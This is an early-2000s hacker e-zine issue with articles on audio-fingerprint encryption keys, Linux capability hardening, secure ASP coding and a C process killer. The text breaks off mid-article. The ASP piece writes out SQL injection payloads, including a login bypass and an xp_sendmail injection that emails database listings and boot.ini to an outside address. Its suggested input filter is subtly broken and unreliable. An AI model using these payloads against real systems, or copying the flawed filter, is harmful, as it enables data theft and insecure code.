Copy Link
Add to Bookmark
Report

infosurge Issue 08

eZine's profile picture
Published in 
infosurge
 · 3 years ago

  

..... ..........................[_]
::: ::: ::: ....... :
.... ........ ::: ........ :::..... ... .... ........ ........ ........
::: ::: :::: ::::: ::: :::: .. :::: ::: :::: ::: :::: ::::.::: :::.::::
.::: ::: :::: ::: :::.:::: :::.:::: :::.:::: ::: .... ::: :::.....
: ::::.:::
..:[ issue 8 ]:.......:
................:
:
.......[ ]...............................................
: :
: Official Web Site - http://infosurge.rendrag.net :
: :
: Official Submissions - phase5@cmdrkeen.net :
: Issue Editor - lym@thepentagon.com :
: :
:..[_].............................................[_]..:
: Issue #8: 02/03/2001 :
: :.
:.:[ ] infosurge - we put the leet in obsolete :
.:
.............................................:
:
......[ ]......................................................................
: :
: Contents Author :
: ---------- -------- :
: :
: #01 Using digital audio fingerprints in encryption - jestar :
: #02 Hardening a Linux system with Capabilities - fyre :
: #03 Secure Web Applications On Windows NT with ASP - black-hand :
: #04 An automated process killer for Linux (in C) - icebsd :
: #05 Phone extension warning device - Black_Smurf :
: #06 UNIX Security - lymco :
: #07 Example configuration of an OpenBSD firewall - aphex :
: #08 History of 3d acceleration - Maticles :
: :
: TOTAL - 99kb :
: :
:..........................................................[_]................:
:
.......:
:
....................................................[ ].......................
: :
: #01 Using digital audio fingerprints in encryption - jestar :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: Ok, it's been a while since I've written anything and I honestly dont
: know if this is being pursued or has been written up by anyone else but
: a quick search and also my research on fingerprinting schemes didn't turn
: anything up. I'm crapping on, so to cut it short this is my disclaimer
: and if im stealing any ideas you've already thrown out to the world I can
: assure you I didnt know, if you wanna pursue me any further than that I
: suggest fucking off.
:
: Ok onto the article. Just recently I was putting a bit of thought into
: the current encryption schemes out there and on key distribution as well
: as key generation and I remember seeing on a news site that there was
: a group of people working on an algorithm that would boil any audio
: file down to a digital signature representing that piece of audio.
: This signature would be unique to each song, but not to each recording
: of that song. What that means is that if you were using a song, the
: fingerprint created from an audio file taken from the radio *should*
: be identical to one created from a cd. Whether this turns out to be
: true is another matter altogether. The group in question is TunePrint
: (www.tuneprint.com) I guess if your interested you probably want to take
: a gander at the site now before continuing with the article.
:
: Heres the idea. You take your plaintext message and think "well, I want
: to send this to mum but I dont want the NSA peeking at it" (I'm sure
: we all like to send heavily encrypted shopping lists to our mothers)
: so you decide to encrypt it (that'll foil them *cough*). Now currently
: you would probably use some sort of public/private key deal which is
: all well and good, but there's still the matter of key transfers etc. So
: say instead you decide to take a fingerprint of your mums favourite
: song (probably something by the rolling stones or an 80's hair band,
: unless your phase in which case its probably 'i sucked a lot of cock to
: get where i am' by regurgitator) and you use the generated fingerprint
: to encrypt the message. You then send the ciphertext to your mum and a
: few days later phone her up and tell her what song it was encoded with
: using some ultra cool oh no black helicopters and sunnies covert message,
: probably "i really like this new song ...... you should listen to it".
: She knows this is the key now and creates a fingerprint which she then
: uses to decode it. Wether or not she then has to eat the fingerprint,
: audio file and plaintext message is up to you.
:
: Of course there's a few problems with the idea put forward here, the
: main one being that the digital fingerprinting tech in question could
: be vapourware, or may not end up being as robust as they are hoping,
: making variance in fingerprints too great to actually be useful. Also it
: would require previous setting up of the way to let the other part know
: what audio was used, but once again, I'm just throwing out some ideas I
: had. If you have any comments or suggestions, or just want to tell me I'm
: dreaming drop me a line at jestar@rendrag.net and all messages will be
: given the appropriate attention (take that as you will).
:
:....
:
...[ ]........................................................................
: :
: #02 Hardening a Linux system with Capabilities fyre :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: Introduction
: ============
:
: Linux 2.2[1] introduced an important new security feature called
: `capabilities', which, if used properly can both reduce the dependence of
: some programs on root privileges, and at the same time make the superuser
: far less powerful than they would be on a traditional UNIX system.
:
: In this article, we're going to discuss how to use capabilities to harden
: a Linux system; that is, assume there are going to be vulnerabilities and
: work out a way to reduce the damage potentially caused by them.
:
:
: [1] It was Linux 2.1 that introduced capabilities, but 2.2 was the first
: stable series to include them, and the bounding capability set idea took
: until .11 to make it in.
:
:
: Capability List
: ===============
: To whet your appetite with what capabilities can do, here's a list of the
: capabilities supported by Linux 2.4.1 (the current stable kernel as of
: this writing):
:
: Name Meaning
: --------------- ---------------------------------------------------
: CAP_CHOWN Allow changes to user and group ownership of files.
: CAP_DAC_OVERRIDE Override all DAC restrictions.
: CAP_DAC_READ_SEARCH Override all read/search DAC restrictions.
: CAP_FOWNER Override all restrictions about file ownership
: CAP_FSETID (not implemented)
: CAP_KILL Override restrictions on sending signals to
: processes not owned by the current effect user id.
:
: CAP_SETGID Allows setgid(), setgroups(), etc.
: CAP_SETUID Allows setuid().
: CAP_SETPCAP Allows transfer/removal of capabilities from
: current process to another process.
:
: CAP_LINUX_IMMUTABLE Allow modification of immutable (+i) and
: append-only (+a) ext2 filesystem attributes.
:
: CAP_NET_BIND_SERVICE Allow binding TCP and UDP sockets to port numbers
: below 1024.
:
: CAP_NET_BROADCAST Allow broadcasting.
: CAP_NET_ADMIN Misc. network admin functions, most notably setting
: promisc. mode.
:
: CAP_NET_RAW Allow use of raw sockets.
: CAP_IPC_LOCK Allow locking of shared memory segments, and
: disabling paging.
:
: CAP_IPC_OWNER Override IPC ownership checks.
: CAP_SYS_MODULE Insert/remove kernel modules, modify bounding cap.
: set.
:
: CAP_SYS_RAWIO ioperm/iopl access, USB.
: CAP_SYS_CHROOT Allow the chroot system call.
: CAP_SYS_PTRACE Allow ptrace of any process.
: CAP_SYS_PACCT Allow control of process accounting.
: CAP_SYS_ADMIN Misc. admin features, including mount, setting host
: and domain names, random device, disk quotas, other
: hardware config changes.
:
: CAP_SYS_BOOT Allow system reboot, halt, etc.
: CAP_SYS_NICE Allow raising priority of this and other processes.
: CAP_SYS_RESOURCE Override resource limits, disk quotas, etc.
: CAP_SYS_TIME Allow setting of system clock.
: CAP_SYS_TTY_CONFIG TTY device configuration.
: CAP_MKNOD Allow special files to be created.
: CAP_LEASE Allow taking leases on files.
:
: 2.2 series kernels seem to support all of these capabilities, with the
: exception of CAP_LEASE, which is new for 2.4. An up-to-date list of
: capabilities with brief descriptions is usually available in
: /usr/include/linux/capability.h.
:
:
: Bounding Sets
: =============
:
: Linux 2.2.11 introduces the concept of `bounding capability sets', which
: can be used to remove certain capabilities so that no process can use
: them, not even ones own by the superuser. The only way to get the
: capabilities back[2] is to reboot. This feature can be used to limit what
: a cracker can do if they somehow get root on your system.
:
: Some examples:
: * Stop script kiddies clobbering your system logs (as is their habit) by
: making the log files append-only (chattr +a) and removing the
: CAP_LINUX_IMMUTABLE capability.
: * Stop LKM rootkits from functioning by disabling CAP_SYS_MODULE.
: * Stop sniffers being run on a compromised machine by removing
: CAP_NET_ADMIN and perhaps CAP_NET_RAW.
:
: The command most often used to manipulate the bounding capability set is
: lcap, written by spoon@ix.netcom.com. It's available for download in
: source and RPM formats for download from
: http://home.netcom.com/~spoon/lcap/download/. If you're using the current
: unstable dist of Debian (sid), you should be able use apt-get in the usual
: way to install lcap. The examples in this article assume lcap 0.0.3, but
: any later version will do.
:
: To use lcap, type 'lcap' followed by the name or names of capabilities you
: want to remove. For example:
: # lcap CAP_NET_RAW
: will remove the raw socket capability, breaking among others ping,
: traceroute, and tcpdump for even the superuser. But before you start
: playing with lcap yourself, read on for some potential pitfalls and tips.
:
: The most common place to modify capabilities is in your init scripts,
: after all privileged daemons have been launched and the hardware
: configured. I run lcap from rc.local right after tuning my hard drive
: parameters with hdparm (which requires hardware access). I shouldn't need
: to point it out, but don't experiment with capabilities on production
: machines. Chances are something will go wrong and you'll be forced to
: reboot (or worse!).
:
: There are a number of common problems encountered by those using bounding
: capabilities, and nastiest of these usually show themselves when shutting
: down or rebooting the system. Removing CAP_SYS_ADMIN, for example, will stop
: you being able to unmount the filesystems, potentially resulting in
: corruption or other damage. If CAP_SYS_BOOT is removed, the system will
: refuse to reboot or power down. This may cause damage on some hardware,
: but not unmounting the filesystems may be worse. Don't play with
: capabilities on production machines, or bad things may happen.
:
:
: [2] Only if the right capabilities are set. Patrick Reynolds demonstrates
: in a post to Bugtraq entitled "Linux capability bounding set weakness" how
: to get capabilities back if CAP_SYS_RAWIO and CAP_SYS_MODULE are not
: disabled. As he suggests, you should always remove these capabilities if
: you've removed any others.
: (Ref: http://archives.neohapsis.com/archives/bugtraq/2000-06/0276.html)
:
:
: In Practice: Securing the Log Directory
: =======================================
:
: In this example, we'll make it so that even the superuser cannot do
: anything but append to the system logs - once a message is logged, it's
: very difficult to remove it (at least from a remote machine).
:
: To begin with, we make our log files append-only with the chattr command:
: # chattr +a /var/log/*
:
: Then, we make the /var/log directory immutable (ie. no changes are
: allowed):
: # chattr +i /var/log
:
: Finally we remove the CAP_LINUX_IMMUTABLE capability from the kernel,
: which allows changing of +a/+i bits on files, and remove the other
: capabilities that are always required (see footnote in previous section
: for an explanation):
: # lcap CAP_LINUX_IMMUTABLE CAP_SYS_RAWIO CAP_SYS_MODULE
:
: We're all done. If you didn't encounter any errors while executing the
: above commands, your log files should be fairly well protected. Try
: removing one to make sure it's not possible, then try using logger(1) to
: log a message to make sure syslogd can still write to the log files.
:
: Note: making /var/log immutable and the files in it append-only breaks the
: log rotation features present in many Linux distributions. I don't know
: any (secure) way around this.
:
:
: Conclusion
: ==========
:
: Although the current Linux capabilities section is far from perfect, it
: definitely does `raise the bar', and may confuse and deter unskilled
: crackers (our friends the script kiddies). The look on Joe Haxor's face
: when he tries the script kiddie staple command `rm -rf /var/log' and it
: fails would be priceless.
:
:....
:
...[ ]........................................................................
: :
: #03 Secure Web Applications On Windows NT with ASP - black-hand :
: ------------------------------------------------ :
:.[_]........................................................................:
:
...:
:
: By black-hand black.wiretapped.net
:
: ASP (Active Server Pages) is a server-side scripting environment developed
: by Microsoft for IIS servers on Windows operating systems. ASP is used to
: create dynamic web pages and is the glue between components in creating
: large web-based applications. By default, IIS will handle all files
: with the .asp extension as ASP scripts, and pass these scripts through
: components and applications to handle the server side scripting. ASP has
: the capability to integrate multiple scripting and markup languages,
: as well as technologies such as COM and Java. The default scripting
: language assumed in ASP scripts is VBScript, a scripting language based
: upon Visual Basic.
:
: Using ASP, it is possible to generate very flexible, dynamic and large
: web based applications, integrating backend web processing and storage
: with client-side (front-end) scripting and HTML.
:
: The level of security in an ASP application or web site is dependent upon
: the developer. There are no built-in mechanisms in IIS to audit and monitor
: intrusions or misuse of a web based application. A security audit of code
: should be carried out as part of the testing and debugging procedure of
: a project. This paper aims to outline common mistakes in ASP programming
: that an attacker can use to compromise system data, and how to develop good
: programming and administration practices to defend against these attacks.
:
: This document will assume that you have some knowledge of basic scripting
: and/or ASP pages.
:
:
: Basic ASP ----------
:
: When deciding upon what tool to use to develop a project, an ASP
: developer is faced with a number of choices. Larger IDE's (Integrated
: Development Environments) take a lot of the work out of writing ASP, as
: common functions and procedures can be dropped into the project easily
: (such as tables, database connections etc.). A more 'purist' approach
: would be to use a simple text editor and other individual programs to
: assist in the development process. There are advantages and disadvantages
: associated with either, and it is usually up to the developer to make
: their own decision based on what they are comfortable with.
:
: The following is a basic ASP page:
:
: <html> <body> <%
: response.write "Hello world"
: %> </body> </html>
:
: The above script should produce the words "Hello world" printed on the
: screen. The following HTML would have been produced by the server and
: sent to the client.
:
: <html> <body> Hello world </body> </html>
:
: So what happened? The client made a request for an ASP script, IIS passed
: this script through the relevant handler and interprets all scripts
: between the <% %> tags. These are ASP opening and closing tags, everything
: between these tags in an ASP script will be interpreted as VBScript by
: default. Next, the VBScript interpreter told the response.write object to
: print back the parameter passed to it ("Hello world") to the client. No
: part of the server-side script is seen by the client - the client only
: sees the output result of operations conducted on the server.
:
: Scripting can be used on the server side to make output dynamic. An
: example would be content for a site being extracted from an SQL server,
: or from a file. Another example would be to increment a counter each time
: a page is fetched, so that records of numbers of visitors to that site
: can be maintained.
:
: The following script will print a loop
:
: <html> <body>
: <% for x=1 to 10 %>
: Printing this text <%=x%><br>
: <% next %>
: </body>
:
: </html>
:
: This will produce the following output to the browser
:
: Printing this text 1 Printing this text 2 Printing this text 3 ..
:
: From that example we can see that there can be multiple instances of
: server-side code within an ASP script, and that a function can span
: multiple code sections. Printing the variable x was achieved by calling
: the variable with an = sign immediately after the opening script tag.
:
:
: User Input ----------
:
: The previous example pages were rather dull. To make a page more
: interactive would require input from the user on the client-side. The
: requirements for user input are a client-side HTML form to pass data to our
: ASP script, and then the server-side code within the ASP script that will
: then process it. Web-based forms are a popular method to obtain information
: from users. A simple example of a HTML page with a form follows here:
:
: <html> <body> <form action=login.asp>
: Username: <input type=text name=username><br> Password:
: <input type=password name=password><br> <input type=submit
: value=Login><br>
: </form> </body> </html>
:
: That HTML will produce a simple login screen that will submit the values
: of the two fields (username and password) to the logon.asp script when the
: "Login" button is pressed.
:
: With logon.asp, we have to be able to accept this input into the script,
: and react accordingly. The inputs into the script are the username and
: password entered by the user at the previous HTML page, and the output
: is either going to be "access allowed" or "access denied" depending on
: the username and password combination entered.
:
: Firstly, the user input is taken into the ASP script and stored in
: variables using the request.querystring object.
:
: <%
: Dim username, password ' declare variables
:
: uname = request.querystring("username") pass =
: request.querystring("password")
:
: This will take the values passed to the script from the HTML form and
: place them into the uname and pass variables respectively. Secondly, we
: decide based on the value of these variables what output we are going to
: produce and inform the user.
:
: if uname = "user" and pass = "pass" then
: response.write "access allowed"
: else
: response.write "access denied"
: end if
: %>
:
: If the passed in username is "user", and the password is "pass", then the
: user will be informed that their login was allowed, otherwise that
: their login was denied. Of course, after being shown that the user has
: logged in, they will proceed through to a members or otherwise normally
: restricted section of the site, and users whose login was denied will be
: redirected back to the main HTML login screen to attempt again.
:
:
: File Access ------------
:
: The FileSystemObject object allows access to files stored on the
: server. The following example will write a file to the system. Note
: that it is writing the file to the server drive, not to the drive of the
: client connecting.
:
: <% Dim fso, test Set fso = CreateObject("Scripting.FileSystemObject") Set
: test = fso.CreateTextFile("c:\\testfile.txt", True) test.WriteLine("This
: is a test.") test.Close %>
:
: If you open testfile.txt in a text viewer, you should be able to see the
: "This is a test." line that we wrote to it.
:
: Reading files is also very similar, we can read the file line by line or
: character by character and store it into variables to use the data.
:
: Dim fso, f Set fso = CreateObject("Scripting.FileSystemObject") Set f =
: fso.OpenTextFile("c:\\testfile.txt", ForReading) Test = f.Read(5)
:
: The variable "test" will contain the first 5 characters of the testfile.txt
: file.
:
: The FileSystemObject can also be used to add, change, move, create and
: delete files and folders. This ability makes the FileSystemObject very
: powerful and useful.
:
:
: Database Access ----------------
:
: Databases are used to store data in an organized manner, making it easier
: and faster to store and retrieve records. In VBScript there are a number
: of data access methods, with the most common for server-side access being
: Microsoft ADO (ActiveX Data Objects).
:
: Using ADO, you can dynamically create an object to store, manipulate and
: navigate through data returned from a database.
:
: The following code creates an ADO connection, and then associates a new
: recordset object with the connection.
:
: Dim connection as New ADODB.Connection connection.Open ConnectionString,
: UserID, Password
:
: Dim recordset as ADODB.Recordset Set recordset = New ADODB.Recordset
: recordset.Open Source, ActiveConnection, CursorType, LockType
:
: The "source" option in the recordset defines the SQL query set to be
: returned into the object. We can then iterate through the returned
: recordset, and manipulate the data. The following example will print a
: single field from each record on a line from a returned recordset:
:
: set RECORDSET = CreateObject("ADODB.RecordSet")
: RECORDSET.ActiveConnection = "ODBCCONNECTION" RECORDSET.CursorType
: = 0
:
: RECORDSET.source = "select field from table"
:
: RECORDSET.Open If RECORDSET.BOF <> True or RECORDSET.EOF <> True then
: Do Until RECORDSET.EOF
: Response.write RECORDSET("field") & "<br>"
: Loop end if
:
:
:
: Securing User-Supplied Input ----------------------
:
: In a previous example, we saw a simple demonstration of an ASP script
: handling a login screen and authenticating a user. Very rarely would you
: see an example in the real world that functions in the same way. A more
: stable and secure solution would have to check the user input passed
: as well as accounting for a lot of other factors.
:
: An attacker can manipulate the data passed to the script so that unexpected
: events occur. An "unexpected event" can be used by an attacker to access
: a restricted "members" sections, or to access database information.
:
: The following is a typical script used to handle logins by querying a
: database to extract username/password information:
:
: Dim uname, pass
:
: uname = request.querystring("username") pass =
: request.querystring("password")
:
: set LOGIN = CreateObject("ADODB.RecordSet") LOGIN.ActiveConnection
: = "ODBCCONNECTION" LOGIN.CursorType = 0
:
: LOGIN.source = "select * from users where uname='"&uname&"'
: and _ pass='"&pass&"'"
:
: LOGIN.Open If LOGIN.BOF = True or LOGIN.EOF = True then
: response.redirect "default.asp" ' failed login
: else
: response.redirect "members.asp" ' logged in
: end if LOGIN.Close
:
:
: The username and password parameters are inserted into an SQL query,
: and then the results of this query are returned into a recordset.
: If the username and password are found, then it will return the full
: record from the database from that user within the recordset. If the
: username and password combination are not found then it will return an
: empty recordset. The if statement checks checks to see that there has
: been a record returned in the recordset. If the recordset is not empty,
: it means that the username and password combination executed by the SQL
: query return a record. Otherwise the username and password combination
: did not return a valid user record.
:
: A successful login will redirect the user to the members.asp page, a failed
: login will redirect the user to default.asp. The username and password
: parameters are passed to the ASP script via a web form, or manually passed
: to the script by appending variable names and values to the URL.
:
: http://www.server.com/login.asp?username=kevin&password=test123
:
: The above example will pass the values "kevin" and "test123" as the
: username and password, and these values will be directly stored into our
: server side variables.
:
: The script then takes the values that are passed and inserts them
: directly into the SQL query, meaning that we are able to pass the script
: values that directly modify the SQL query that is executed.
:
: As an example, we will pass the following to the script, and then
: investigate how the SQL is executed and what result is produced:
:
: username: 1 password: 1' or pass <> '1
:
: The code used to construct the SQL query is as follows:
:
: "select * from users where uname='"&uname&"' and pass='"&pass&"'"
:
: If the query is then constructed with the variables that we are passing
: in, the following query will be executed.
:
: "select * from users where uname='1' and pass='1' or pass <> '1'
: _ _________________
:
: The two inputs that we passed into this query are underlined, and it
: can be seen that because of the password that we have supplied
: we have as a result returned every record in the database, thus allowing
: us access to members.asp without a real username or password. This is
: because the SQL is extracting every record where pass is equal to 1,
: as well as every record where pass is NOT equal to 1, which of course,
: is every record in that table.
:
: The Microsoft SQL server also supports being able to execute multiple
: SQL commands on one line and in one query. So in the previous example,
: with a bit of tinkering we can INSERT new records or DELETE records. As
: a more complex example, Microsoft SQL server comes with some stored
: procedures that will email the result of an SQL query to an email
: address. The following is the syntax for that query, we simply pass it
: into our password field and it will execute as part of the whole query.
:
: EXECUTE master.dbo.xp_sendmail "suspects@2600.org.au","","select * from
: sysdatabases", "C:\\boot.ini" --'
:
: Passing those parameters to the stored procedure will email the results
: of the query "select * from sysdatabses" to suspects@2600.org.au. As an
: extra bonus, the xp_sendmail stored procedure allows you to attach any
: file to the email from the system. In the above example we have attached
: c:\\boot.ini to the email. The sysdatabases table is a system table that
: contains the names and information of all databases on the SQL server,
: which can come in handy. Further investigation into the system databases
: and stored procedures that are installed by default with Microsoft SQL
: Server will result in more possibilities, such as being able to change
: permissions and executing commands on the server.
:
:
: Filtering Input ----------------
:
: As a solution to unexpected passed input, we can develop a function to
: wrap around variables containing user input to filter out characters that
: are deemed "unnecessary" or dangerous.
:
: The following function will strip unnecessary characters from the passed
: input.
:
: Function SQLFilter(str)
: Dim regEx Set regEx = New RegExp regEx.Pattern = "A-Z,0-9"
: regEx.IgnoreCase = True SQLFilter = regEx.Replace(str, "")
: End Function
:
:
: IIS Security Holes. --------------------
:
: There are a number of generic IIS security holes that could assist an
: attacker in compromising a remote database and system. These security
: holes can be used to view the full source to a server side scripts.
: Thus a developer should never assume that the script source is secure
: when developing their site or application.
:
: Common mistakes include servers hosting sample scripts and directories,
: or running versions of remote data access and IIS services that are known
: to contain security holes.
:
: These holes are common and are discussed in my IIS security article
: located at:
:
: http://black.wiretapped.net/iis.txt
:
:
: More Programming Errors -------------------------
:
: It is common for a developer to include test and debug modes into
: applications for development and debugging purposes, and this is only
: secured by the fact that in a production environment a remote user would
: not be able to view server-side code.
:
: One such example is an online store that had a debug mode for testing
: purposes that allowed a user to specify a discount on product and view
: debug information, such as SQL statements. Enabling the debug mode was
: as simple as parsing the variable "debug" to equal 1 as such
:
: http://www.server.com/shop.asp?productid=435&debug=1
:
: This was uncovered by using an IIS security hole to view and analyze
: the source to the ASP scripts. At the top of the ASP script there was
: something similar to
:
: <%
: Dim debug debug = request.querystring("debug")
:
: [..]
:
: if debug = 1 then
: response.write RECORDSET.Source
: end if
: %>
:
: Such common programming errors are common and can lead to interesting
: finds by curious and persistent web surfers.
:
: Other possibilities include scanning for backups of server side scripts
: by appending common backup extensions to filenames. It is common for
: some development environments and editors to create backups of files,
: or for administrators to manually create backups before making changes.
:
: An example would be UltraEdit's (www.ultraedit.com) default practice of
: creating a copy of each file open with a .bak extension. Since the .bak
: extension has no default association in IIS, it can be viewed as a normal
: text document when it is requested in a web browser.
:
: A document on this is available on my website at:
:
: http://black.wiretapped.net
:
:
: Session State ---------------
:
: Once a user has logged in, it is important to track the status and
: permissions of each user on the server side. There are a number of methods
: that can be used to do this, including cookies, IIS authentication, or
: server side session value storage. At a simple level, keeping track of
: session state could simply mean checking a Boolean value to see if the
: requesting user has permissions to that resource.
:
: On login, the application would set a Boolean value to true If the login
: was sucessful:
:
: LOGIN.Open If LOGIN.BOF = True or LOGIN.EOF = True then
: session("logged") = 0
: response.redirect "default.asp" ' failed login
: else
: session("logged") = 1 response.redirect "members.asp"
: ' logged in
: end if LOGIN.Close
:
: A successful login would set the server-side variable "logged" to be
: equal to one. A new set of server-side variables are spawned for each
: user, and are identified at the server-web browser level using unique and
: random 64-bit strings generated by the server, making the probability of
: hijacking another users session difficult (assuming that the method of
: random number generation used by IIS is "random enough").
:
: When access permission to a restricted resource or differentiation between
: different levels of user is required, we simply read out the value stored
: in this session variable.
:
: Such an example would be to make a simple check at the top of a page that
: the developer wishes to restrict access to.
:
: <% if session("logged") <> 1 then
: response.redirect "default.asp?error=login"
: end if
: %>
:
: If the session variable "logged" had been set to 1 during login time,
: then access to the rest of the script would be allowed, otherwise the
: request would be redirected to the default page and an error recorded.
:
: This method prevents "backdoor" / "deep linked" access to parts of a
: site, and ensures that only users with particular privilege level are
: allowed access. The checking routing can be placed in an include file,
: and included as part of each script where access has to be tracked:
:
: <!--#INCLUDE FILE="members.inc" -->
:
: Other variables that are commonly stored in session variables include
: usernames, and different levels of permissions. Session variables are
: cleared on the server after a default 20 minutes of inactivity.
:
:
: Microsoft SQL Server ---------------------
:
: A very common but often unknown problem with Microsoft SQL server 7.0 is
: that it contains a default "sa" account with a blank password. To exploit
: this, an attacker simply uses the SQL management console to connect to
: your SQL server and view databases information, or change permissions
: and execute system commands using the extended stored procedures.
:
: It is extremely important that this default account is removed, and that
: access to port 1433 (the port that the Microsoft SQL server binds to)
: is blocked from all hosts except the IIS Server. In an ideal situation,
: the SQL server would be in a non-routable private address range away from
: a live network segment to restrict remote access.
:
: There is now a Linux command line client that can be used to access
: and scan for Microsoft SQL servers called linsql.c, it is available for
: download from packetstorm (http://packetstorm.securify.com), it requires
: the freeTDS library.
:
: Conclusion ------------
:
: Despite all the hype, ASP is and can be relatively secure. All it takes
: is good programming practice and a secure and patched IIS server.
:
: The purpose of this document was to be a basic introduction to secure
: ASP programming practices, and is meant to compliment reference material
: (http://msdn.microsoft.com) and programming experience.
:
: Copyright 2001, black-hand
: (black@wiretapped.net, http://black.wiretapped.net)
: This document may only be reproduced in full.
:
:....
:
...[ ]........................................................................
: :
: #04 An automated process killer for Linux (in C) - icebsd :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: An automated process killer for Linux (in C)
: -- icebsd
: =======================================================
:
:
: As fun as system administration goes, most of the chores done by a system
: administrator are often 1) redundant, 2) unimportant, 3) more often than
: not, they get blamed for the consequences of their actions. So the
: question that came into my mind today (today being a boring Saturday), was
: whether or not a program could be made to emulate the task of your typical
: bastard administrator from hell (BAFH - a spin off from BOFH).
:
: The idea was to create a process killer which would kill processes based
: on certain attributes of the process. The reason for using Linux was
: obvious: the /proc filesystem is easy to use.
:
: In my initial thoughts of construction, I had devised the main objectives
: of the program:
:
: 1) It must raise it's priority higher than other programs.
: - i.e. posix scheduling on linux, or setpriority()
:
: 2) It must be quick, and use a small amount of memory.
: - i.e. no dynamic memory, e.g. link lists :)
:
: 3) It doesn't have to be run by root, although running the program
: as root would *really* provide you with an automated BAFH.
: - i.e. johnsmith can run it too.
:
: 4) It should have emergency shell access, with higher priority
: than the program.
:
: 5) It would obviously need to read the /proc filesystem, and
: calculate the appropriate values and compare them with the user
: defined threshold levels.
: - i.e. /proc fs stats, and algorithms.
:
: 6) Finally, it should not kill processes run by "root" unless the
: user defined it to do so.
:
: I will now write about the topics listed above which describe the program
: in a non-reproducing way, in the hopes of the reader being able to make
: the program themselves before actually seeing mine. (source attached at
: the end of this text file.)
:
: 1) Raising Priority
: --------------------
: Raising the priority of a process can be done in two ways on a linux
: system. One way is via the nice() system call, which allows the user to
: modify the priority of the program to a higher state, but still allows the
: kernel to drop its priority back down.
:
: Another way is to use the POSIX scheduler functions to elevate the
: program's priority to near "real-time" scheduling. Once it is in this
: mode, it will have higher priority than any other program not in real-time
: mode and cannot be dropped back down by the kernel. This is also known as
: a static priority.
:
: To do this, you would use:
:
:
: struct sched_param sp;
: sp.sched_priority = priority; /* assign priority */
: sched_setscheduler(pid, SCHED_FIFO, &sp); /* posix function */
:
:
: In my program, I wrapped that into another function called
: raise_priority(). This function uses the generic UNIX function
: setpriority() as a backup if posix doesn't work (which wouldn't
: happen on linux systems anyway).
:
: 2) Small and fast. Nothing fancy
: --------------------------------
: Because the program is now running at a scheduling level which could cause
: the system to slow down or crash, ideally a small and fast program would
: be better than a comparatively larger and slower (yet more fancy) program.
:
: Initially, the idea is to read from the /proc without having to store too
: much information in the RAM, such as using a linked list or something
: similar. The functions to read from directories such as scandir() would be
: inappropriate. A simple call to readdir() would suffice. Let's see why.
:
:
: NAME
: scandir, alphasort - scan a directory for matching entries
:
: SYNOPSIS
: #include <dirent.h>
:
: int scandir(const char *dir, struct dirent ***namelist,
: int (*select)(const struct dirent *),
: int (*compar)(const struct dirent **, const struct dirent
: **));
:
:
: Scandir looks very convenient. It reads a string in the first argument,
: and provides the vector namelist with a lovely pre-malloc() data which you
: have probably free later on. Convenient, but expensive.
:
:
: NAME
: readdir - read a directory
:
: SYNOPSIS
: #include <sys/types.h>
:
: #include <dirent.h>
:
: struct dirent *readdir(DIR *dir);
:
:
: This call is obviously better for this program, as there are less data
: allocated in RAM as readdir() returns a static structure. However, this is
: also less convenient as far as searching or sorting goes, but for this
: program it is fine.
:
: 3) And the question is: to run as root, or not to run as root.
: ---------------------------------------------------------------
: Obviously, to raise your priority you need root access, but to have the
: functionality for the rest of the program, you can still use a normal
: user. So a simple compromise was made: you can run as both, but you can't
: do as much if you run the program as a normal user. i.e. you can only
: automatically kill your own processes.
:
: 4) A 'real-time' shell
: ----------------------
: A real-time shell is easily provided by forking the process and elevating
: the process to maximum priority. This provides the user with the ability
: to kill it's own program, should it happen to spin out of control.
:
: This was done in my program by calling raise_priority(1) instead of
: raise_priority(0)
:
: 5) Getting something useful from /proc
: --------------------------------------
: Firstly, to quickly brief on the /proc filesystem:
:
: * Every numeric directory is a pid (process id)
: * Inside a pid pseudo-directory, there are files which correlate to the
: attributes of the process.
: * The (UID) owner of the pseudo-directory is the owner of the process.
:
: In particular, the "stat" file is the one we're after. This file contains
: the attributes for start time, total cpu time, etc. Another file also
: important is the "/proc/uptime" which you have to use to calculate the
: values, as the /proc filesystem basis it's timings on when the system was
: "started". They also judge their timings based in 1/100th of a
: second. This also means the uptime and process timers will wrap around
: eventually.
:
: At first glance, it's ambiguous. But after looking through the procps
: package, which contains the source code for "ps" and "top", it wasn't too
: difficult to assimilate the structure.
:
: bash$ cat /proc/1/stat
: 1 (init) S 0 0 0 0 -1 256 43 7891 160 18324 1 338 279 269 0 0 -1 0 30
: 901120 86 2147483647 134512640 134529764 3221225284 3221224232 1073873768
: 0 0 3622886140 671818755 1236245 0 0
:
: The first value is the PID of the program (which should also be the
: directory name too.) The word in parenthesis is the name of the program,
: as provided when executed via an execve() call.
:
: The "S" character is the state character. It stands for "sleep". Most
: processes tend to do this, that is, idle and sleep. Other process have "R"
: which indicate that it's running and using CPU time.
:
: After the state character, we'll refer to it the 1st real value, since
: the values after the state character that we really care about, so to
: make things short I'll only explain the values you need to know.
:
: The 11th and 12th value are utime and stime respectively. Combined, they
: provide the attribute for "total cpu time actually used". This is not the
: same as "length of program time", which is described by the 19th value.
:
: The reason for this difference is that the "total cpu time actually used"
: is often less than the "length of program time" because of multi-tasking,
: which basically means the process only gets a slice of cpu-time, and not
: hog it 100% of the time.
:
: Two other values need to be known. That's the system uptime, which is from
: "/proc/uptime" -- it's the first value. And the current system time, which
: is gained via the C library's time() function.
:
: From there on, we can devise a simple formula to calculate the values we
: need:
:
: process_seconds = ((system_uptime * 100) - p_start) / 100;
: process_tstart = system_time - process_seconds;
: process_total_time = p_utime + p_stime; /* this is
: in 1/100th second */
:
: * process_seconds is the total length of time the program has been
: running, (in seconds of course). The 19th value we got (from
: /proc/###/stat) was actually a 1/100th of a second time value based from
: the start of system. Hence the usage of system_uptime in the formula
: above.
:
: * process_tstart is the start time, in time_t format (i.e. based on the C
: library's time(), instead of the system uptime)
:
: * process_total_time is the total amount of CPU time that has actually
: been used in 1/100th of a second.
:
: From those values, we can calculate the PCPU (percentage of the cpu used
: by the process) by dividing the process_total_time (once you convert it to
: seconds) with process_seconds and multiplying by 100 to get a percentage.
:
: Because process_total_time is in 1/100th of a second, it's value is as if
: it had already been multiplied by 100, so we don't need to do it.
:
: pcpu = process_seconds ? (process_total_time / process_seconds)
: : 0.0;
:
: (The ?-condition is to check to see if process_seconds is zero, to prevent
: a division by zero error.)
:
: By using the above values, you can check a user defined threshold for
: killing or nice() the process to something more appropriate.
:
:
: /* check for nice threshold */
